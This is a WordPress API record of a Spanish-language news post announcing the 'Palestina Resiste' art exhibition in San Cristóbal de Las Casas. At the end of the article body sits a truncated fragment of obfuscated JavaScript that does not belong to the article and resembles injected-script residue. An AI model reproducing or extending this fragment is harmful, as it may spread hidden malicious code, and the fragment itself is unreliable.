{"id":16879,"date":"2024-07-25T01:09:24","date_gmt":"2024-07-25T01:09:24","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16879"},"modified":"2024-07-25T01:09:25","modified_gmt":"2024-07-25T01:09:25","slug":"palestina-resiste-arte-y-solidaridad-en-la-enredadera","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16879","title":{"rendered":"Palestina resiste, arte y solidaridad en La Enredadera"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"819\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/WhatsApp-Image-2024-07-24-at-4.58.25-PM-819x1024.jpeg\" alt=\"\" class=\"wp-image-16880\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/WhatsApp-Image-2024-07-24-at-4.58.25-PM-819x1024.jpeg 819w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/WhatsApp-Image-2024-07-24-at-4.58.25-PM-240x300.jpeg 240w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/WhatsApp-Image-2024-07-24-at-4.58.25-PM-768x960.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/WhatsApp-Image-2024-07-24-at-4.58.25-PM.jpeg 1080w\" sizes=\"auto, (max-width: 819px) 100vw, 819px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>24 de julio del 2024. San Crist\u00f3bal de Las Casas.- En medio de la persistente crisis y el genocidio en Palestina, artistas de todo el mundo han levantado su voz a trav\u00e9s de poderosas im\u00e1genes de resistencia. Con el prop\u00f3sito de visibilizar el horror y exigir un alto a la guerra, La Enredadera presenta la exposici\u00f3n &#8220;Palestina Resiste&#8221;, un evento que combina gr\u00e1fica, m\u00fasica y reflexiones en torno a la lucha palestina.<\/p>\n\n\n\n<p>Los organizadores informaron que la exposici\u00f3n se llevar\u00e1 a cabo el viernes 26 de julio a las 6 de la tarde en La Enredadera, ubicada en Calle Primero de Marzo 32 B, Barrio de La Merced. Durante el evento, se exhibir\u00e1n obras de artistas comprometidos con la causa palestina, llenando las paredes de mensajes de resistencia y solidaridad.<\/p>\n\n\n\n<p>Adem\u00e1s, habr\u00e1 una proyecci\u00f3n gr\u00e1fica que, acompa\u00f1ada de sonido, buscar\u00e1 conmover y movilizar a los asistentes a trav\u00e9s del color y la m\u00fasica. Exposici\u00f3n de Im\u00e1genes Contra el Genocidio: Una muestra de arte gr\u00e1fico de artistas internacionales que han creado obras para denunciar y resistir el genocidio en Palestina.<\/p>\n\n\n\n<p>Artistas por Palestina: Una secci\u00f3n dedicada a aquellos creadores que, con su talento, apoyan la causa palestina y la lucha por la justicia. Proyecci\u00f3n Gr\u00e1fica por Palestina: Una serie de im\u00e1genes y animaciones que, junto con m\u00fasica, buscan generar un impacto emocional y promover la reflexi\u00f3n. Proyecci\u00f3n Cine Debate: Un espacio para la reflexi\u00f3n y el di\u00e1logo en torno a la situaci\u00f3n en Palestina, acompa\u00f1ado de proyecciones cinematogr\u00e1ficas.<\/p>\n\n\n\n<p>\u201cEste evento es una llamada a la solidaridad y a la acci\u00f3n, una invitaci\u00f3n a alzar la voz y a no permanecer indiferentes ante el sufrimiento del pueblo palestino. No te pierdas esta oportunidad de unirte a una causa justa y de compartir un momento de arte y reflexi\u00f3n en La Enredadera\u201d, concluyen.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 24 de julio del 2024. San Crist\u00f3bal de Las Casas.- En medio de la persistente crisis y el genocidio en Palestina, artistas de todo el mundo han levantado su voz a trav\u00e9s de poderosas im\u00e1genes de resistencia. Con el prop\u00f3sito de visibilizar el horror y exigir un alto a la guerra, La &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16880,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-16879","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16879","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16879"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16879\/revisions"}],"predecessor-version":[{"id":16881,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16879\/revisions\/16881"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16880"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16879"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16879"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16879"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}